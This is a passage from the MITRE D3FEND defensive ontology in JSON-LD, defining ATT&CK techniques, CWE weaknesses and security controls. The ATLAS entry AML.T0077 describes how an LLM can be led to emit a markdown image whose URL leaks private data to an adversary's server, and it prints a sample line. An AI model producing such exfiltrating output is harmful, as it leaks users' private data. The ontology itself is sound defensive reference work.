        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system identifies organization-defined unacceptable mobile code.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2009-09-21T00:00:00"
      },
      "rdfs:label": "CCI-001166"
    },
    {
      "@id": "d3f:blocks",
      "@type": "owl:ObjectProperty",
      "d3f:definition": "x blocks y: The entity x blocks off the use of digital artifact y by reference to a block or allow list (or both.)",
      "rdfs:isDefinedBy": {
        "@id": "http://wordnet-rdf.princeton.edu/id/01480024-v"
      },
      "rdfs:label": "blocks",
      "rdfs:subPropertyOf": [
        {
          "@id": "d3f:counters"
        },
        {
          "@id": "d3f:filters"
        },
        {
          "@id": "d3f:may-block"
        }
      ]
    },
    {
      "@id": "d3f:OTSynchronizeTimeCommandEvent",
      "@type": "owl:Class",
      "d3f:definition": "Used to align timing mechanisms.",
      "rdfs:label": "OT Synchronize Time Command Event",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:OTTimeCommandEvent"
        },
        {
          "@id": "_:Na81063bd98334515aec97d2d5138ff59"
        }
      ]
    },
    {
      "@id": "_:Na81063bd98334515aec97d2d5138ff59",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:has-participant"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:OTSynchronizeTimeCommand"
      }
    },
    {
      "@id": "d3f:CCI-001762_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The organization disables organization-defined functions, ports, protocols, and services within the information system deemed to be unnecessary and/or nonsecure.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:narrower": {
        "@id": "d3f:SystemConfigurationPermissions"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2013-02-28T00:00:00"
      },
      "rdfs:label": "CCI-001762"
    },
    {
      "@id": "d3f:SMBFileSupersedeEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event where a file is overwritten if it exists or created if it does not. This operation combines file creation and modification semantics.",
      "rdfs:label": "SMB File Supersede Event",
      "rdfs:subClassOf": {
        "@id": "d3f:SMBEvent"
      }
    },
    {
      "@id": "d3f:CWE-448",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-448",
      "d3f:definition": "A UI function is obsolete and the product does not warn the user.",
      "rdfs:label": "Obsolete Feature in UI",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-446"
      }
    },
    {
      "@id": "d3f:process-identifier",
      "@type": "owl:DatatypeProperty",
      "d3f:definition": "x process-identifier y: The process x has the process identifier y.",
      "rdfs:label": "process-identifier",
      "rdfs:subPropertyOf": {
        "@id": "d3f:process-data-property"
      }
    },
    {
      "@id": "d3f:T1583.001",
      "@type": "owl:Class",
      "d3f:attack-id": "T1583.001",
      "d3f:definition": "Adversaries may acquire domains that can be used during targeting. Domain names are the human readable names used to represent one or more IP addresses. They can be purchased or, in some cases, acquired for free.",
      "rdfs:label": "Domains",
      "rdfs:subClassOf": {
        "@id": "d3f:T1583"
      }
    },
    {
      "@id": "d3f:WindowsBatchFile",
      "@type": [
        "owl:NamedIndividual",
        "d3f:ExecutableScript"
      ],
      "rdfs:label": "Windows Batch File"
    },
    {
      "@id": "d3f:CWE-1097",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1097",
      "d3f:definition": "The product uses a storable data element that does not have all of the associated functions or methods that are necessary to support comparison.",
      "rdfs:label": "Persistent Storable Data Element without Associated Comparison Control Element",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-1076"
      }
    },
    {
      "@id": "d3f:FileGetPermissionsEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event where a file's security settings or access control list (ACL) is retrieved, detailing permissions granted to users or processes.",
      "rdfs:label": "File Get Permissions Event",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:FileEvent"
        },
        {
          "@id": "_:N2f8b28649a8641e888eb11a97e5bddd7"
        }
      ]
    },
    {
      "@id": "_:N2f8b28649a8641e888eb11a97e5bddd7",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:preceded-by"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:FileCreationEvent"
      }
    },
    {
      "@id": "d3f:process-ancestor",
      "@type": [
        "owl:ObjectProperty",
        "owl:TransitiveProperty"
      ],
      "d3f:definition": "x process-ancestor y: The process y is a process ancestor of process x, indicating one or more process creation events were conducted at process y and subsequently created process x.",
      "rdfs:label": "process-ancestor",
      "rdfs:subPropertyOf": {
        "@id": "d3f:process-property"
      }
    },
    {
      "@id": "d3f:Reference-Reg.exeCalledFromCommandShell_MITRE",
      "@type": [
        "owl:NamedIndividual",
        "d3f:ExternalKnowledgeBase"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://car.mitre.org/analytics/CAR-2013-03-001/"
      },
      "d3f:kb-abstract": "Registry modifications are often essential in establishing persistence via known Windows mechanisms. Many legitimate modifications are done graphically via regedit.exe or by using the corresponding channels, or even calling the Registry APIs directly. The built-in utility reg.exe provides a command-line interface to the registry, so that queries and modifications can be performed from a shell, such as cmd.exe. When a user is responsible for these actions, the parent of cmd.exe will likely be explorer.exe. Occasionally, power users and administrators write scripts that do this behavior as well, but likely from a different process tree. These background scripts must be learned so they can be tuned out accordingly.",
      "d3f:kb-author": "MITRE",
      "d3f:kb-mitre-analysis": "",
      "d3f:kb-organization": "MITRE",
      "d3f:kb-reference-of": [
        {
          "@id": "d3f:ProcessLineageAnalysis"
        },
        {
          "@id": "d3f:ProcessSpawnAnalysis"
        }
      ],
      "d3f:kb-reference-title": "CAR-2013-03-001: Reg.exe called from Command Shell",
      "rdfs:label": "Reference - CAR-2013-03-001: Reg.exe called from Command Shell - MITRE"
    },
    {
      "@id": "d3f:Reference-SecuringWebTransactions",
      "@type": [
        "owl:NamedIndividual",
        "d3f:GuidelineReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://www.nccoe.nist.gov/sites/default/files/library/sp1800/tls-serv-cert-mgt-nist-sp1800-16b-final.pdf"
      },
      "d3f:kb-abstract": "Organizations risk losing revenue, customers, and reputation, and exposing internal or customer data to\nattackers if they do not properly manage Transport Layer Security (TLS) server certificates. TLS is the\nmost widely used security protocol to secure web transactions and other communications on the\ninternet and internal networks. TLS server certificates are central to the security and operation of\ninternet-facing and internal web services. Improper TLS server certificate management results in\nsignificant outages to web applications and services-such as government services, online banking, flight operations, and mission-critical services within an organization-and increased risk of security breaches.",
      "d3f:kb-author": "William Haag, Murugiah Souppaya, Paul Turner, William C. Barker, Brett Pleasant, Susan Symington",
      "d3f:kb-organization": "NIST",
      "d3f:kb-reference-of": {
        "@id": "d3f:ActiveCertificateAnalysis"
      },
      "d3f:kb-reference-title": "Securing Web Transactions",
      "rdfs:label": "Reference - Securing Web Transactions"
    },
    {
      "@id": "d3f:d3fend-use-case-object-property",
      "@type": "owl:ObjectProperty",
      "rdfs:subPropertyOf": {
        "@id": "d3f:d3fend-object-property"
      }
    },
    {
      "@id": "d3f:X86CodeSegment",
      "@type": [
        "owl:NamedIndividual",
        "d3f:ImageCodeSegment",
        "d3f:ProcessCodeSegment"
      ],
      "rdfs:label": "X86 Code Segment"
    },
    {
      "@id": "d3f:T1214",
      "@type": "owl:Class",
      "d3f:attack-id": "T1214",
      "d3f:definition": "The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services. Sometimes these credentials are used for automatic logons.",
      "owl:deprecated": true,
      "rdfs:comment": "This technique has been revoked by T1552.002",
      "rdfs:label": "Credentials in Registry",
      "rdfs:seeAlso": {
        "@id": "d3f:T1552.002"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:CredentialAccessTechnique"
      }
    },
    {
      "@id": "d3f:has-location",
      "@type": "owl:ObjectProperty",
      "d3f:definition": "x has-location y: The entity x is situated in a particular spot or position y.",
      "rdfs:isDefinedBy": {
        "@id": "http://wordnet-rdf.princeton.edu/id/02133811-s"
      },
      "rdfs:label": "has-location",
      "rdfs:seeAlso": {
        "@id": "http://www.obofoundry.org/ro/#OBO_REL:located_in"
      },
      "rdfs:subPropertyOf": {
        "@id": "d3f:associated-with"
      },
      "skos:altLabel": "located_in"
    },
    {
      "@id": "d3f:ATTACKEnterpriseDataSource",
      "@type": "owl:Class",
      "rdfs:label": "ATTACK Enterprise Data Source",
      "rdfs:subClassOf": {
        "@id": "d3f:ATTACKEnterpriseThing"
      }
    },
    {
      "@id": "d3f:MemoryBlock",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:contains": {
        "@id": "d3f:MemoryWord"
      },
      "d3f:definition": "In computing (specifically data transmission and data storage), a block, sometimes called a physical record, is a sequence of bytes or bits, usually containing some whole number of records, having a maximum length; a block size. Data thus structured are said to be blocked. The process of putting data into blocks is called blocking, while deblocking is the process of extracting data from blocks. Blocked data is normally stored in a data buffer and read or written a whole block at a time.",
      "d3f:may-contain": {
        "@id": "d3f:Record"
      },
      "rdfs:isDefinedBy": {
        "@id": "https://dbpedia.org/page/Block_(data_storage)"
      },
      "rdfs:label": "Memory Block",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:MemoryExtent"
        },
        {
          "@id": "_:Nc095d21779a740c997ded7ea86662858"
        },
        {
          "@id": "_:N51417898b3384d4bb191620a2909df18"
        }
      ]
    },
    {
      "@id": "_:Nc095d21779a740c997ded7ea86662858",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:contains"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:MemoryWord"
      }
    },
    {
      "@id": "_:N51417898b3384d4bb191620a2909df18",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-contain"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Record"
      }
    },
    {
      "@id": "d3f:T1059.013",
      "@type": "owl:Class",
      "d3f:attack-id": "T1059.013",
      "d3f:definition": "Adversaries may abuse built-in CLI tools or API calls to execute malicious commands in containerized environments.",
      "rdfs:label": "Container CLI/API",
      "rdfs:subClassOf": {
        "@id": "d3f:T1059"
      }
    },
    {
      "@id": "d3f:has-mediator",
      "@type": "owl:ObjectProperty",
      "d3f:definition": "x has-mediator y: The entity x relies on or is facilitated by entity y.",
      "rdfs:label": "has-mediator",
      "rdfs:subPropertyOf": {
        "@id": "d3f:has-participant"
      }
    },
    {
      "@id": "d3f:DecoyArtifact",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "A decoy is an imitation digital artifact in any sense of a digital artifact, object, or phenomenon that is intended to deceive a cyber attacker's surveillance devices or mislead their evaluation.  Examples include fake files, accounts, hosts (honeypots), and network segments (honeynets).",
      "d3f:may-contain": {
        "@id": "d3f:DigitalArtifact"
      },
      "rdfs:label": "Decoy Artifact",
      "rdfs:seeAlso": [
        {
          "@id": "dbr:Deception_technology"
        },
        {
          "@id": "https://doi.org/10.1007/978-3-319-25133-2"
        },
        {
          "@id": "https://shield.mitre.org/"
        }
      ],
      "rdfs:subClassOf": [
        {
          "@id": "d3f:DigitalInformationBearer"
        },
        {
          "@id": "_:N7596cb9ba72c4ccd87de062dd57049c6"
        }
      ],
      "skos:altLabel": [
        "Decoy",
        "Decoy Object",
        "Lure",
        "Trap"
      ]
    },
    {
      "@id": "_:N7596cb9ba72c4ccd87de062dd57049c6",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-contain"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:DigitalArtifact"
      }
    },
    {
      "@id": "d3f:CWE-463",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-463",
      "d3f:definition": "The accidental deletion of a data-structure sentinel can cause serious programming logic problems.",
      "rdfs:label": "Deletion of Data Structure Sentinel",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-707"
      }
    },
    {
      "@id": "d3f:NIST_SP_800-53_R5_AC-6_6",
      "@type": [
        "owl:NamedIndividual",
        "d3f:NISTControl"
      ],
      "d3f:control-name": "Least Privilege | Privileged Access by Non-organizational Users",
      "d3f:member-of": {
        "@id": "d3f:NIST_SP_800-53_R5"
      },
      "d3f:narrower": [
        {
          "@id": "d3f:LocalFilePermissions"
        },
        {
          "@id": "d3f:SystemConfigurationPermissions"
        }
      ],
      "rdfs:label": "AC-6(6)"
    },
    {
      "@id": "d3f:d3fend-catalog-annotation-property",
      "@type": "owl:AnnotationProperty",
      "rdfs:label": "d3fend-catalog-annotation-property",
      "rdfs:subPropertyOf": {
        "@id": "d3f:d3fend-annotation"
      },
      "skos:altLabel": "d3fend-vendor-registry-annotation-property"
    },
    {
      "@id": "d3f:CWE-757",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-757",
      "d3f:definition": "A protocol or its implementation supports interaction between multiple actors and allows those actors to negotiate which algorithm should be used as a protection mechanism such as encryption or authentication, but it does not select the strongest algorithm that is available to both parties.",
      "rdfs:label": "Selection of Less-Secure Algorithm During Negotiation ('Algorithm Downgrade')",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-693"
      }
    },
    {
      "@id": "d3f:ChatroomClient",
      "@type": "owl:Class",
      "d3f:definition": "Client software used to describe conduct any form of synchronous conferencing, occasionally even asynchronous conferencing. The term can thus mean any technology ranging from real-time online chat and online interaction with strangers (e.g., online forums) to fully immersive graphical social environments.",
      "rdfs:isDefinedBy": {
        "@id": "dbr:Chat_room"
      },
      "rdfs:label": "Chatroom Client",
      "rdfs:subClassOf": {
        "@id": "d3f:CollaborativeSoftware"
      },
      "skos:altLabel": "Chat Room Client"
    },
    {
      "@id": "d3f:Graph-basedSemi-supervisedLearning",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-GBSSL",
      "d3f:definition": "Graph-based Semi-Supervised Learning (GSSL) methods aim to classify unlabeled data by learning the graph structure and labeled data jointly.",
      "d3f:kb-article": "## References\nYang, S., Pan, L., & Cheng, J. (2021). Graph-based Semi-Supervised Learning Methods for Imbalanced Data Classification. [Link](https://www.sciencedirect.com/science/article/pii/S0031320321002132?viewFullText=true).",
      "rdfs:label": "Graph-based Semi-supervised Learning",
      "rdfs:subClassOf": {
        "@id": "d3f:Semi-supervisedTransductiveLearning"
      }
    },
    {
      "@id": "d3f:LinuxClone",
      "@type": "owl:Class",
      "d3f:definition": "Creates a child process and provides more precise control over the data shared between the parent and child processes.",
      "rdfs:isDefinedBy": {
        "@id": "https://man7.org/linux/man-pages/man2/clone.2.html"
      },
      "rdfs:label": "Linux Clone",
      "rdfs:subClassOf": {
        "@id": "d3f:OSAPICreateProcess"
      }
    },
    {
      "@id": "d3f:T1620",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1620",
      "d3f:definition": "Adversaries may reflectively load code into a process in order to conceal the execution of malicious payloads. Reflective loading involves allocating then executing payloads directly within the memory of the process, vice creating a thread or process backed by a file path on disk (e.g., [Shared Modules](https://attack.mitre.org/techniques/T1129)).",
      "d3f:modifies": {
        "@id": "d3f:ProcessSegment"
      },
      "rdfs:label": "Reflective Code Loading",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:DefenseEvasionTechnique"
        },
        {
          "@id": "_:N0a33920a08ea4258b3a470e77b14a70e"
        }
      ]
    },
    {
      "@id": "_:N0a33920a08ea4258b3a470e77b14a70e",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:modifies"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:ProcessSegment"
      }
    },
    {
      "@id": "d3f:CWE-268",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-268",
      "d3f:definition": "Two distinct privileges, roles, capabilities, or rights can be combined in a way that allows an entity to perform unsafe actions that would not be allowed without that combination.",
      "rdfs:label": "Privilege Chaining",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-269"
      }
    },
    {
      "@id": "d3f:T1564.002",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1564.002",
      "d3f:definition": "Adversaries may use hidden users to hide the presence of user accounts they create or modify. Administrators may want to hide users when there are many user accounts on a given system or if they want to hide their administrative or other management accounts from other users.",
      "d3f:modifies": {
        "@id": "d3f:UserInitConfigurationFile"
      },
      "rdfs:label": "Hidden Users",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1564"
        },
        {
          "@id": "_:N84ded24bf6c843d2b0f7dc41239471ac"
        }
      ]
    },
    {
      "@id": "_:N84ded24bf6c843d2b0f7dc41239471ac",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:modifies"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:UserInitConfigurationFile"
      }
    },
    {
      "@id": "d3f:AML.T0077",
      "@type": "owl:Class",
      "d3f:attack-id": "AML.T0077",
      "d3f:definition": "An adversary may get a large language model (LLM) to respond with private information that is hidden from the user when the response is rendered by the user's client. The private information is then exfiltrated. This can take the form of rendered images, which automatically make a request to an adversary controlled server.\n\nThe adversary gets AI to present an image to the user, which is rendered by the user's client application with no user clicks required. The image is hosted on an attacker-controlled website, allowing the adversary to exfiltrate data through image request parameters. Variants include HTML tags and markdown\n\nFor example, an LLM may produce the following markdown:\n```\n![ATLAS](https://atlas.mitre.org/image.png?secrets=\"private data\")\n```\n\nWhich is rendered by the client as:\n```\n<img src=\"https://atlas.mitre.org/image.png?secrets=\"private data\">\n```\n\nWhen the request is received by the adversary's server hosting the requested image, they receive the contents of the `secrets` query parameter.",
      "rdfs:label": "LLM Response Rendering - ATLAS",
      "rdfs:seeAlso": {
        "@id": "https://atlas.mitre.org/techniques/AML.T0077"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:ATLASExfiltrationTechnique"
      },
      "skos:prefLabel": "LLM Response Rendering"
    },
    {
      "@id": "d3f:CWE-551",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-551",
      "d3f:definition": "If a web server does not fully parse requested URLs before it examines them for authorization, it may be possible for an attacker to bypass authorization protection.",
      "rdfs:label": "Incorrect Behavior Order: Authorization Before Parsing and Canonicalization",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CWE-696"
        },
        {
          "@id": "d3f:CWE-863"
        }
      ]
    },
    {
      "@id": "d3f:may-be-contained-by",
      "@type": [
        "owl:ObjectProperty",
        "owl:TransitiveProperty"
      ],
      "owl:inverseOf": {
        "@id": "d3f:may-contain"
      },
      "rdfs:label": "may-be-contained-by",
      "rdfs:subPropertyOf": {
        "@id": "d3f:may-be-associated-with"
      }
    },
    {
      "@id": "d3f:LinuxInitModule",
      "@type": "owl:Class",
      "d3f:definition": "Loads an ELF image into kernel space, performs any necessary symbol relocations, initializes module parameters to values provided by the caller, and then runs the module's init function.",
      "rdfs:isDefinedBy": {
        "@id": "https://man7.org/linux/man-pages/man2/init_module.2.html"
      },
      "rdfs:label": "Linux Init_Module",
      "rdfs:subClassOf": {
        "@id": "d3f:OSAPILoadModule"
      }
    },
    {
      "@id": "d3f:CWE-544",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-544",
      "d3f:definition": "The product does not use a standardized method for handling errors throughout the code, which might introduce inconsistent error handling and resultant weaknesses.",
      "rdfs:label": "Missing Standardized Error Handling Mechanism",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-755"
      }
    },
    {
      "@id": "d3f:T1548.003",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1548.003",
      "d3f:definition": "Adversaries may perform sudo caching and/or use the sudoers file to elevate privileges. Adversaries may do this to execute commands as other users or spawn processes with higher privileges.",
      "d3f:may-modify": {
        "@id": "d3f:EventLog"
      },
      "d3f:modifies": {
        "@id": "d3f:OperatingSystemConfigurationFile"
      },
      "rdfs:label": "Sudo and Sudo Caching",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1548"
        },
        {
          "@id": "_:N5546675abcab4189b2294dafadd46505"
        },
        {
          "@id": "_:Nf15db196742b40798fb2e4e2a6dee9d0"
        }
      ]
    },
    {
      "@id": "_:N5546675abcab4189b2294dafadd46505",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-modify"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:EventLog"
      }
    },
    {
      "@id": "_:Nf15db196742b40798fb2e4e2a6dee9d0",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:modifies"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:OperatingSystemConfigurationFile"
      }
    },
    {
      "@id": "d3f:EX-0005.01",
      "@type": "owl:Class",
      "d3f:attack-id": "EX-0005.01",
      "d3f:definition": "Threat actors may exploit inherent properties or errata in the hardware/logic design rather than injecting new code. Levers include undocumented or weakly specified behaviors (scan chains, test modes, debug straps), counter/timer rollovers and wraparound, interrupt storms and priority inversions, MMU/TLB corner cases, DMA engines that can write outside intended buffers, and bus arbitration or clock-domain crossing issues that permit stale or reordered writes. RNGs and crypto accelerators with flawed seeding or side-channel leakage can expose secrets or enable predictable authentication values. In programmable logic, vulnerable state machines, insufficient reset paths, and hazardous partial-reconfiguration regions create opportunities to drive the design into privileged or undefined states. Even reliability features can be turned: hardware timers intended for liveness can be paced to starve control loops; ECC policies can be nudged so correction conceals attacker-induced drift. The common thread is using the platform’s own guarantees, timing, priority, persistence, or fault handling, to cause privileged behavior that the software stack accepts as “by design.”",
      "rdfs:label": "Design Flaws - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/technique/EX-0005/01/"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:EX-0005"
      },
      "skos:prefLabel": "Design Flaws"
    },
    {
      "@id": "d3f:IntranetIPCNetworkTraffic",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "Intranet IPC network traffic is network traffic that does not cross a given network's boundaries and uses a standard inter-process communication (IPC) networking protocol.",
      "d3f:may-contain": {
        "@id": "d3f:File"
      },
      "rdfs:label": "Intranet IPC Network Traffic",
      "rdfs:seeAlso": [
        {
          "@id": "dbr:Inter-process_communication"
        },
        {
          "@id": "dbr:Intranet"
        }
      ],
      "rdfs:subClassOf": [
        {
          "@id": "d3f:IPCNetworkTraffic"
        },
        {
          "@id": "d3f:IntranetNetworkTraffic"
        },
        {
          "@id": "_:N55becc70dbce458298655171633e8f42"
        }
      ]
    },
    {
      "@id": "_:N55becc70dbce458298655171633e8f42",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-contain"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:File"
      }
    },
    {
      "@id": "d3f:precedes",
      "@type": "owl:ObjectProperty",
      "d3f:definition": "x precedes y: The event or action x occurs before event or action y in time.",
      "rdfs:isDefinedBy": {
        "@id": "http://purl.obolibrary.org/obo/BFO_0000063"
      },
      "rdfs:label": "precedes",
      "rdfs:subPropertyOf": {
        "@id": "d3f:associated-with"
      }
    },
    {
      "@id": "d3f:Reference-NetworkMapping",
      "@type": [
        "owl:NamedIndividual",
        "d3f:InternetArticleReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://en.wikipedia.org/wiki/Network_mapping"
      },
      "d3f:kb-author": "https://en.wikipedia.org/",
      "d3f:kb-reference-title": "Network Mapping",
      "rdfs:label": "Reference - Network Mapping"
    },
    {
      "@id": "d3f:unloads",
      "@type": "owl:ObjectProperty",
      "d3f:definition": "x unloads y: The technique or artifact performs the action of unloading some artifact (applications, kernel modules, or hardware drivers, etc.) from a computer's memory.",
      "rdfs:label": "unloads",
      "rdfs:subPropertyOf": {
        "@id": "d3f:evicts"
      }
    },
    {
      "@id": "d3f:T1477",
      "@type": "owl:Class",
      "d3f:attack-id": "T1477",
      "d3f:definition": "The mobile device may be targeted for exploitation through its interface to cellular networks or other radio interfaces.",
      "owl:deprecated": true,
      "rdfs:comment": "This technique has been deprecated.",
      "rdfs:label": "Exploit via Radio Interfaces - ATTACK Mobile",
      "rdfs:subClassOf": {
        "@id": "d3f:ATTACKMobileInitialAccessTechnique"
      },
      "skos:prefLabel": "Exploit via Radio Interfaces"
    },
    {
      "@id": "d3f:CCI-002462_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system provides additional data integrity verification artifacts along with the authoritative name resolution data the system returns in response to external name/address resolution queries.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:narrower": {
        "@id": "d3f:DomainTrustPolicy"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2013-07-02T00:00:00"
      },
      "rdfs:label": "CCI-002462"
    },
    {
      "@id": "d3f:IntranetNetwork",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "An intranet is a private network accessible only to an organization's staff or delegates. Generally a wide range of information and services from the organization's internal IT systems are available that would not be available to the public from the Internet. A company-wide intranet can constitute an important focal point of internal communication and collaboration, and provide a single starting point to access internal and external resources. In its simplest form an intranet is established with the technologies for local area networks (LANs) and wide area networks (WANs).",
      "rdfs:isDefinedBy": {
        "@id": "dbr:Intranet"
      },
      "rdfs:label": "Intranet Network",
      "rdfs:subClassOf": {
        "@id": "d3f:Network"
      }
    },
    {
      "@id": "d3f:HardwareDevice",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "Hardware devices are the physical artifacts that constitute a network or computer system. Hardware devices are the physical parts or components of a computer, such as the monitor, keyboard, computer data storage, hard disk drive (HDD), graphic cards, sound cards, memory (RAM), motherboard, and so on, all of which are tangible physical objects. By contrast, software is instructions that can be stored and run by hardware. Hardware is directed by the software to execute any command or instruction. A combination of hardware and software forms a usable computing system.",
      "rdfs:isDefinedBy": {
        "@id": "dbr:Computer_hardware"
      },
      "rdfs:label": "Hardware Device",
      "rdfs:seeAlso": {
        "@id": "https://schema.ocsf.io/objects/device_hw_info"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:DigitalInformationBearer"
        },
        {
          "@id": "d3f:PhysicalArtifact"
        }
      ]
    },
    {
      "@id": "d3f:OTDeleteDataCommandEvent",
      "@type": "owl:Class",
      "d3f:definition": "OT command that removes data on a remote device.",
      "rdfs:label": "OT Delete Data Command Event",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:OTWriteCommandEvent"
        },
        {
          "@id": "_:Nd0599255e6774b79a6761ee8da0ec5ff"
        }
      ]
    },
    {
      "@id": "_:Nd0599255e6774b79a6761ee8da0ec5ff",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:has-participant"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:OTDeleteDataCommand"
      }
    },
    {
      "@id": "d3f:Hardware-basedWriteProtection",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:Hardware-basedWriteProtection"
      ],
      "d3f:d3fend-id": "D3-HBWP",
      "d3f:definition": "Physical methods of preventing data from being written to computer storage.",
      "d3f:hardens": {
        "@id": "d3f:SecondaryStorage"
      },
      "d3f:kb-reference": {
        "@id": "d3f:Reference-WhatisHardwareWriteProtect"
      },
      "rdfs:label": "Hardware-based Write Protection",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:PlatformHardening"
        },
        {
          "@id": "_:Nddc1a7d4e81c416793a0c0569b39982c"
        }
      ]
    },
    {
      "@id": "_:Nddc1a7d4e81c416793a0c0569b39982c",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:hardens"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:SecondaryStorage"
      }
    },
    {
      "@id": "d3f:T0859",
      "@type": "owl:Class",
      "d3f:attack-id": "T0859",
      "d3f:definition": "Adversaries may steal the credentials of a specific user or service account using credential access techniques. In some cases, default credentials for control system devices may be publicly available. Compromised credentials may be used to bypass access controls placed on various resources on hosts and within the network, and may even be used for persistent access to remote systems. Compromised and default credentials may also grant an adversary increased privilege to specific systems and devices or access to restricted areas of the network. Adversaries may choose not to use malware or tools, in conjunction with the legitimate access those credentials provide, to make it harder to detect their presence or to control devices and send legitimate commands in an unintended way.",
      "rdfs:label": "Valid Accounts - ATTACK ICS",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ATTACKICSLateralMovementTechnique"
        },
        {
          "@id": "d3f:ATTACKICSPersistenceTechnique"
        }
      ],
      "skos:prefLabel": "Valid Accounts"
    },
    {
      "@id": "d3f:CCI-001496_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system implements cryptographic mechanisms to protect the integrity of audit tools.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:narrower": {
        "@id": "d3f:FileEncryption"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2009-09-29T00:00:00"
      },
      "rdfs:label": "CCI-001496"
    },
    {
      "@id": "d3f:CCI-002359_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system implements a reference monitor for organization-defined access control policies that is small enough to be subject to analysis and testing, the completeness of which can be assured.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:narrower": {
        "@id": "d3f:UserAccountPermissions"
      },
